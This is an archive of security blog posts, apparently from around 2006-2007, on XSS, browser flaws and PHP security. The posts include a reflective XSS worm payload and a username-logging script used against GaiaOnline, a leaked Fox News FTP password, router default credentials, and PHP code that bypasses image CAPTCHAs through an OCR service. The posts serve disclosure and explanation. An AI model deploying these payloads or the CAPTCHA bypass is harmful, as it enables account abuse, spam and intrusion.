Foxnews to become wikinews?

Foxnews.com has taken an unsuspected turn and become an open wiki site. For more info see http://linuxinit.net/site/?id=664. Summary:

While browsing around the Fox News website, I found that directory indexes are turned on. So, I started following the tree up, until I got to /admin. Eventually, I found my way into /admin/xml_parser/zdnet/, in which, there is a shell script. Seeing as it’s a shell script, and I use Linux, I took a peek. Inside, is a username and password to an FTP. So, of course, I tried to login. The result? Epic fail on Fox’s part. And seriously, what kind of password is T1me Out. This is just pathetic.

http://www.foxnews.com/admin/xml_parser/zdnet/grab_zd_files.sh

And here’s something just too funny, something I hope will turn up on xkcd.com

Raptor porn

(originally located at http://www.foxnews.com/images/root_images/071907_velociraptor1.jpg, this is a mirrored copy)

Share

Happy birthday securiteam blogs

As other recent posts have mentioned, these blogs have just turned 2 years old. In order to celebrate the event I wanted to look back at the archives and find a post that stood out. This is hard when you’re talking about a blog of this high calibre. I started various popular posts, they were all very well written, technically and linguistically, so I had a hard time choosing. I decided to take an alternate route, I decided to read the posts that were made around the time I joined the site, the ones that convinced me as to the greatness of this blog.

I went back to January 2006 and one post in particular jumped right out at me; Interview: Ilfak Guilfanov. This was a great post addressing what at the time was a major issue and something that made me realise just what type of people make up this blog. I suggest you have a read of that post and other similar great posts, they make great reading for a Monday morning/early afternoon.
Happy birthday blogs, may your next 2 years be even greater.

Share

Phishing just got a little less tedious

I know I shouldn’t be merely referencing others’ blog posts, but this is just too good. Kuza55 has written up how a phisher can very easily get around the phishing-filter implemented in IE7, Firefox and Opera.

Share

Burb Proxy open for orders

I’m writing this purely to pass on a message. If you’ve ever used the burp suite and have a comment about the software, now is the time to let the developers know. If you haven’t tried it yet, give it a go, you won’t regret it.

This is just to let you know that work is underway on the next release of Burp Suite, which should be available later this year. This will be a major upgrade with lots of new features in all of the tools.

At this point, it would be good to hear any other feature requests that you may have, however large or small. Please reply to me directly or join the discussion here:

http://blog.portswigger.net/

and I’ll address as many as I can.

I’d be grateful if you would pass this email on to anyone else in your team who uses Burp Suite.

Share

Follow up to my post about my ex-ISP’s backdoor

It’s been roughly two months since Accidental backdoor by ISP. Dan Goodin has written this whole thing nicely for everyone to read.
ISP ejects whistle-blowing student
Don’t forget to digg it :p

Share

Firefox 3 to support HttpOnly cookies

HttpOnly cookies are a mechanism Microsoft developed for IE6 SP1 to add some security to cookies. The web developer would set a cookie (for instance the session cookie) to be HttpOnly (both ASP and PHP support setting HttpOnly cookies) and the browser would only ever use that cookie when sending HTTP requests, not when client side scripting asks to read the cookie. This means if there was a cross site scripting flaw on the website the JS wouldn’t be able to use the cookies. The solution isn’t perfect, but it does what it’s meant to do and doesn’t harm anyone.

Support for this is already in the Firefox 3 alphas, if you are inclined to use them, otherwise you’ll have to wait until November or so for the first official ff3 release.

If you are a web developer I suggest you start updating your code to use HttpOnly where applicable.

Share

Accidental backdoor by ISP [updated x2]

I’ve been a happy customer of my ISP BeThere for a few months now. Overall they’re great, they are quick to sort you out with your connection, their emails and other communications are very humerous and actually make good reading (I remember the routers documentation CD has a warning label reading something like “warning: geeky content inside”). When I signed up I managed to get the username root, this pleased me no end and I thought I’d finally found an ISP I want to stay with forever.

Finding the hole
Recently though a friend of mine was extremely bored and decided to nmap my IP address. He found, and told me, that I seemed to be listening on port 23, telnet. I was extremely puzzled by this, I haven’t port forwarded port 23, I would never use a telnet daemon for anything. It occured to me that it must be the router itself running the daemon. I telnetted to 192.168.1.254 and lo and behold it asked me to log in. I log in with default credentials (yes, I had never gotten around to changing those), which are Administrator:null
(more…)

Share

XSS Worm strikes GaiaOnline

GaiaOnline is a highly popular web based game, a perfect target for an XSS worm. Exactly what Kyran sets out to do, with a little help from Kuza. I’ll be writing about his worm, why it’s so special, the results he’s collected and the response from GaiaOnline.

Normally when you consider an XSS worm, such as the infamous Samy worm, or lesser known IPB ones the one thing they have in common is how they spread. They abuse a filter flaw to store itself in some permanent storage system such as the users profile or the users sugnature. This worm differs in that it uses only reflective XSS holes.

A reflective XSS hole is one where the input you provided is not permanent but is only printed onto the page because it was one of your input variables, usually via GET or POST, in this case POST.

Back to the worm, Kyran was not interested in causing havoc, this worm is merely an experiment to see how much a non-permanent worm can spread on a site reach of 40% (source). First I’ll give you the logging script used.

log.php:

<head>
<title>Error!</title>
<meta http-equiv="refresh" content="0;url=http://www.gaiaonline.com">
</head>
<?php
// Declares file to log to.
$myFile = "log.txt";
// Set file handler. or end execution if file doesnt exist.
$fh = fopen($myFile, 'a') or die("can't open file");
//Take data sent via POST from start.js and put it in $stringData
$stringData = $_POST["username"];
// Write string to file.
fwrite($fh, $stringData);
// Add a tilde followed by newline to divide each entry.
$stringData = "~n";
fwrite($fh, $stringData);
fclose($fh);

?>

As you can see he only logged the username, as he was not interesting in actually taking control of any accounts. Sadly no timestamp was set by each record, but I’m hedging my bets that next time there will be :p.

Now, onto the more juicy bits, the worm. It’s not long code (you won’t have to wade through something Samy like again). In short it does this:

  1. Create content to replace the page by
  2. Set up an AJAX object
  3. Create the variables used to send a PM (sending the PM to everyone in their friends list)
  4. Send the PM.

Gaia have a feature that if you send your PM to friends@gaia then the PM actually goes to everyone in your friends list, this allowed for an obvious shortcut in coding, but the worm would be perfectly possible without this, it would just require one extra AJAX request and some parsing. The payload of the PM is as follows:

“><script defer xsrc=//gaiaonli.site.com/start.js></script><style> (url changed)
As you can see it just pulls in the script again and again sends the PM to everyone in the friends list. I’ve got a copy of the script here, I have changed the url of log.php and start.js in the code, but otherwise this is what start.js would have looked like.

That’s the worm. It can be argued that it is a persistant attack as it is stored in a PM, but as Kyran said “the XSS is reflective, just the propogation method is persistant. But, that’s just semantics”.

What was logged through this worm? Kyran ran the worm for 3-4 hours (with a central .js file it’s easy to stop the worm) and logged 1500 unique usernames, but not much more can be deduced in terms of growth over time due to the lack of timestamps. Since the passwords weren’t logged we cannot check statistics on those, but I would hazard a guess at the statistic being similair to those of sites like MySpace. Furthermore, the point of this exercise was to see how well a reflective XSS worm can spread on a large site.

Kyran did post the worm (code included) on their forum, but that was quickly taken down by one of their mods. He created a new thread without the code in it, which has stayed up. Here’s Kyrans summary of the second thread “the staff haven’t posted anything. It’s mostly people calling me a terrorist”. As of yet they haven’t contacted him for any details (it is possible the mod who took down the first thread kept a copy of the code in which case there is no need to contact Kyran if all they want to do is patch the hole).

What can be understood from this whole incident? Reflective XSS can viably be used to spread an effective worm and sending variables via POST does not make people any safer. Considering how very common reflective XSS is (34 pages of reflective XSS flaws) this is something web masters really need to start getting to grips with. Furthermore it’s clear that Gaiaonline aren’t ready for users reporting flaws, they don’t know what to do when a flaw is reported and they aren’t too quick at fixing them (at the time of writing the flaw is still up).

Now… what site is next?

Share

PDF = Potential Death File?

I suggest you tell your browsers to change how it handles .pdf files so that instead of displaying them in your browser it will download them. Sven Vetsch has written about a flaw found by found by Stefano Di Paola and Giorgio Fedon (who presented this at CCC, link) in which a .pdf file can run arbitrary JavaScript on the site hosting the file. It seems that just host hosting PDFs you are putting your sites users at risk to all the evil doings JavaScript can perform. If you want to find out more about the flaw I suggest you read the afore-linked blog post, or gnucitizen’s take on it (which has a PoC on it). What I am more interested in right now is fixing the issue.

Obviously a plugin upgrade would be nice, but what about between then and now? I’d be happy if we could get a fix out quickly for web masters to apply to their sites but since the part of the url after the hash is never sent the server (which in this case is what holds the malicous code) any server side solution is pretty much impossible.
Oh what a fun start to the new year eh? On a more light hearted note, first person to see a SPAM email using this technique wins a virtual cookie from me.

Share

Acutenix denying web site flaws

Todays story of “You’re lying, we weren’t vulnerable” comes from Acutenix. Copy pasted from their “about us” page, this is how they describe themselves:

Acunetix was founded with [web application threats] in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released – a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.

I suppose I should give some background info about everything before laying it into Acunetix too much.
(more…)

Share

XSSing with the expect header

I know that XSS is looked down upon by a lot of people in the security sphere but I feel XSS has been severely underestimated by a lot of people. Using it to steal cookies is really only the very start of it.

That’s besides the point, though I will post links to rarely used (or maybe just up and coming) uses for XSS later in this post.

Here’s HTTP Expect header as defined in the RFC:

The Expect request-header field is used to indicate that particular server behaviors are required by the client. (more…)

Share

Should we kill IE?

Earlier today I stumbled across a link to explorerdestroyer.com which is a site trying to convince web developers to urge their IE users to switch to firefox. They ask web developers to employ one of a range of solution, from showing an advert of firefox to IE users to not allowing IE users near their pages.

To me their approach seems silly. The problem (as they see it) is that IE doesn’t support various standards and encourages proprietary features. If everyone used firefox then what’s to stop that from being the next “IE”? Won’t it get proprietary features which will then get used. As an example (last I read) firefox allows transparency via CSS but the W3C has no official support of transparency (IE and Opera also support this, but each in their own way).

I think there should be an even spread of browser usage. This would encourage sites being developed to the standards and more importantly would speed up browser improvements as all the various companies would have to constantly improve their browsers to maintain their user base.

I am reminded of a South Park episode where the people rebel against Walmart burning it down and instead all shop at a local shop turning it into the next Walmart, then repeating the whole process over again.

I’m all for people saying how bad one thing is and promoting another, but to me this seems too far. They go as far as saying that Firefox has to quickly gain users so that IE6 users don’t switch to IE7 and stay with it. IE7 is a good browser, it fixes a lot of issues that people hate about IE6. I think that IE6 users should switch to IE7 (when it’s released) and then leave it up to them to do whatever they want, but deliberately forcing people away from a good browser is simply not a clever idea. I’m glad that Mozilla aren’t affiliated with this site as I dislike the aggressive mannerisms, though I would enjoy reading Mozilla’s comment on it.

Oddly enough, the site I’ve linked to works perfectly fine with IE and they have no nag screens asking me to change over.

Share

…and one giant step for PHP security

While hosts are still undecided on whether to upgrade to PHP5 or not, the people pushing the limits of possibility are busy planning PHP6. PHP6 is mainly a cleanup of code and the addition of some object oriented features (and some other little bits which probably mean more to others than to me). Nevertheless in terms of security it’s something I’m already drooling over.

Every week several exploits are found in various applications made by PHP. Even given the vast number of applications (and therefore flaws) some problems can’t be blamed solely on the coder. At least for me there have always been functions I’m extremely careful of when I pass any parameter into. Now all this is going to be made simpler, safer, better.

Register globals are gone! No more detection and coding around it, or worse; no detection and getting your ass pawned. To be honest no one really has it on any more anymore and but I’ve still found it a major hassle. Specially when I’m helping people out who are used to having it on and suddenly have lost it.

Magic quotes are gone! Again, no hassle of detection. Instead we’ll have the input_filter extension which is so very much better.

Easier detection of MIME types. Should improve checking if those uploaded files are valid.

header() will only accept one header, hopefully virtually killing off HTTP response splitting attacks.

For full details about the April PHP6 meeting read the minutes.

Share

Stupid people

All my life I’ve come across stupid people, I’ve come to expect people to be stupid, and I’m usually not let down by that assumption. When I find intelligent people I treasure them like Eskimos would treasure electric blankets covered in whale fat powered by a bucket sized cold fusion reactor. Of course I use the web more than is healthy, that’s one reason I always speak to stupid people, this is all fine and something I take in my stride. It’s when you come across people that aren’t meant to be stupid yet are that you lose that little faith you had left in humanity. It’s when an admin of a site which has thousands of members and has been running for 3 years doesn’t realise how bad it is that people can run HTML from PMs, signatures, usernames, forum posts or article comments.

You inform the admin about these flaws, explaining the dangers of XSS by taking the example of an attacker using JavaScript, you let them know they should run htmlentities() on all user input. What do they do? They either totally ignore you or they add some code to replace all instances of <script> with script. Idiots.

Here’s my theory; People who had Geocities accounts when they were 10 branched into 3 paths. They either 1) Got bored of the whole developer thing and started collecting Pokemon cards 2) Got good and now make efficient, secure web applications or 3) stayed at the Geocities level but got money and can afford their own domain. It is this 3rd category that now pollute the web with their binary waste. When you don’t realise that error checking is needed to prevent anyone from deleting a PM you need to find a cliff to jump off. When told so and your counter-argument is that no one can be bothered to manually browse to /remove_pm.php?message_id=1, …id=2, …id=3 Then a cliff simply won’t do the job, you’ll need to find something simpler. I suggest jumping on front of a car…. …yes, a moving one.

The lesson: I understand that people have to start at the basics of anything before they can get any better, but for the love of all that’s holy (Eskimos in their bucket sized cold fusion reactor powered, whale fat covered, electric blankets) read articles on the web, ask people, learn mistakes others’ made, experiment on your own computer or borrow books from a library before you go spending money to manage a web site. I understand that everyone makes mistakes but learn from them and learn to accept help from people who offer it.

Share

Saying NO to messy user agents

I’ll ask you what should be a simple question and let’s see if you know the answer. What is the user agent of the browser you’re currently using? Well… granted it’s not something people try to remember, but that almost all the user agents start with “Mozilla/x.0 (…” doesn’t help.

Here are my current user agents:
Firefox: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
IE: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Sure you can tell them apart, but what’s with all the junk? Why do they both start with Mozilla, what’s the junk at the end of IE’s UA and why does Firefox has Windows in the string twice? In case you’re interested, the reason “Mozilla” exists in just about every UA string around is mentioned here

Why not start afresh and make it properly this time around. What works well? What kind of a system should the new UA be like? Well… think about it for a minute, the UA string usually holds information such as browser name, version, OS name and OS version. In essence it’s attribute, value, attribute, value. Why not make it like an XML tag? You could immediately scrap the < and > as they’d be pointless, but otherwise taking this approach should work.

Unlike XML the attributes should be fixed. Not having them fixed means we’ll end up with the same mess we have at the moment, on the other hand it means we have to put great thought to what the attributes are. Firstly the most important one would be UAtype which could equal browser, spider, download manager or other. The last option would include such things as PHP, applets loading a page and people’s own programs which download a file (unless they are download managers of course). It could also be used to inform the server that this could be a braille browser or a screen reader, though maybe they should come under another optional attribute.

The other attributes could be Organisation which would be the organisation which made the agent, UAname, which would be the name of the software, UAversion, which would be 1.5 in the case of firefox and 6.0 in the case of IE, OSname and OSversion. This would make my firefox UA string:
UAtype=”browser” Organisation=”Mozilla” UAname=”Firefox” UAversion=”1.5″ OSname=”Windows” OSversion=”XP Pro SP2″
This is much easier to read and understand. Obviously each attribute should be optional but you shouldn’t be able to add your own. Well… you could add your own but don’t expect it to make a difference.

Why do I want all this done? Image the difficulties that software developers have in creating the software that logs who visits your sites. With this is would suddenly be so very easy. If nothing else this would promote competition in that area which is always a good thing. It would also help the web developers who write JavaScript which is browser dependant and have to parse the UA string for various bits and bobs.

The change would not have to be overnight, it could be a gradual process of acceptance (or rejection, depending on how you look at it). New browsers could have their regular user agent and a second header called XMLUA which follows the pattern described here. Obviously there would be no way for PHP or JavaScript to read this new XMLUA header until the functions/variables are built into the languages. One possibility is to wait for the functions to be created or else the web servers could see if a XMLUA header exists and if so then replace the regular user agent with the new one. This would in fact brake the existing browser detection functions in every language so waiting for the languages to upgrade would be the ideal solution.

Eventually the regular UA string could be dropped.

Maybe you feel I missed out a crucial attribute, maybe you feel the current system works fine (why fix what ain’t broke?). Let me know.

Share

Bypassing the random image anti-spam feature

A friend of mine has been playing a game which you play through the browser, some tasks can be automated which allows the player to earn money or increase stats quickly, or while not at the computer (this particular action does not interact with other players). My friend then create a bookmarklet (?) which would automate this task. All was hunky dory until the game asked the user to read an image and copy the text down. This is done precisely to prevent these automated bots, still…. it provides an interesting problem. How could you read the image and continue the game automatically?

I couldn’t sleep the first night I was presented with this problem, I went down more dead ends than I thought existed in this kind of a problem. Eventually I decided to take a break and start again. Logically how could JavaScript read an image? It can’t, it would need some other technologies, these would have to reside either on a remote domain if they are web based or on the local machine. JavaScript cannot run either of these, so it seemed I came to a dead end, again. In fact, it would be impossible to solve this using JS at all, you would infact need a seperate program precisely because you need to call either a remote web site or a local program. Realising this decreased my enthusiasm as now it was merely an experiment to see if it could be done.

I remembered a certain web service that I’d used a while back, namely WhatTheFont (WTF). This service can read an image and tries to deduce the font used from the characters it can find. I figured I could use this to read the characters in an image.
I found a random image such as Tokoy which is the kind of image the user has to copy. I tried uploading the image to the WTF site, but it failed to read the image. I noticed the sample images they provide are much larger, so I scaled up my image and submitted it again, this time WTF could read the image perfectly.

Now… if only I could get some PHP code to read an image file, scale it up, submit it to WTF and read the response.

I should say that the code I provide is very untidy, this is because it’s the result of sleepless nights and at points I hacked certain bits, then edited them later again. I explain the code just below the code itself.


function doIt()
{
$r = rand(100000,999999);
if (@imagecreatefromgif($_GET['img']))
$ext = 'gif';
else
$ext = 'png';
if (!@copy ($_GET['img'],$r.$ext))
die("Error");
chmod($r.$ext,0777);
$img = up_size($r.$ext,5,$ext);
$lines = file("http://www.myfonts.com/WhatTheFont/Upload?url=http://www.whiteacid.org/img_reader/".$r.$ext);
parseInput($lines);

unlink($r.$ext);
}

The code initially determines what image type the image is. The script only allows PNG and GIF. BMP wouldn’t be used as no one really uses it any more and JPG wouldn’t be used as it would blur the lines making it difficult for humans to read the letters. It then saves the image to the same folder the script resides in under a random name (or quits if there’s a problem). I did this because for some reason the script seemed to work better when the image was in the same folder, or at least on the same domain. I then scale the image up (that function is below), perform the request and run parseInput (again, code coming below). Finally I remove the image (which up_size() creates).
The up_size function’s code is here:

function up_size($imageUrl,$ratio,$extension)
{
if ($extension == 'gif')
{
$src_img = imagecreatefromgif($imageUrl);
}
else
{
$src_img = @imagecreatefrompng($imageUrl);
}
$origw = imagesx($src_img);
$origh = imagesy($src_img);

$dst_img = imagecreatetruecolor($origw*$ratio,$origh*$ratio);
imagecopyresampled($dst_img,$src_img,0,0,0,0,$origw*$ratio,$origh*$ratio,imagesx($src_img),imagesy($src_img));

imagepng($dst_img, "$imageUrl");
//imagepng($dst_img);

return $dst_img;

}

It reads the file and creates an image object, reads it’s width and height, makes a new image with a larger canvas and copies the old smaller image onto this canvas streching it to fit. That’s how it scales up images. Finally it saves this in a file.

Now that the image had been scaled up it was sent off to WTF and the reponse was stored in a variable ready to be parsed. Now, before I give the code for the parsing section you should know how the outputted HTML looks. Very simply WTF prints out;

<input type=’text’ name=’ch[0]‘ id=’wtfchar0′ value=’T’ size=’2′ maxlength=’1′ style=’font-size:20; font-family:verdana; text-align:center;’>
<input type=’text’ name=’ch[1]‘ id=’wtfchar1′ value=’o’ size=’2′ maxlength=’1′ style=’font-size:20; font-family:verdana; text-align:center;’>
<input type=’text’ name=’ch[2]‘ id=’wtfchar2′ value=’k’ size=’2′ maxlength=’1′ style=’font-size:20; font-family:verdana; text-align:center;’>
<input type=’text’ name=’ch[3]‘ id=’wtfchar3′ value=’y’ size=’2′ maxlength=’1′ style=’font-size:20; font-family:verdana; text-align:center;’>
<input type=’text’ name=’ch[4]‘ id=’wtfchar4′ value=’o’ size=’2′ maxlength=’1′ style=’font-size:20; font-family:verdana; text-align:center;’>

There is more stuff and things in between those segments, but that’s what we’re after. The easiest thing to search for would be id=’wtfchar$n‘, then parse the value field after it. We’d have to note that if the character would not be identified the value attribute would be blank, so we could return a question mark instead, to let the user know that one character remained unknown. ok, the code

function parseInput($lines)
{
$c=0;
foreach ($lines as $line_num => $line)
{
if (strpos($line,"id='wtfchar$c'") != false)
{
$char = substr($line,strpos($line,"id='wtfchar$c' value='")+strlen("id='wtfchar$c' value='"),2);
if ($char == "' ")
$char = '?';
else
$char = substr($char,0,1);
echo $char;
$c++;
}
}
}

For each line of output search for “id=’wtfchar$c’” where $c is an incrementing integer which starts at 0. Essentially if found (then you’re on the right line of code), then parse out the value or echo a question mark.

One more line of code is also required, you need to run doIt(), then you’re done.

That’s about it, using that code you can parse text from an image. This allows you to complete some forms automatically. This obviously could be used for spamming reasons, which is why instead of using images like I’ve used them people should use ones like hotmail and gmail:

Hotmail random image

To see the script in action I’ve made one script which allows you to create images of text and the other one as described here. I used to host examples of this code in action but my new host doesn’t allow file-access from a URL.

Share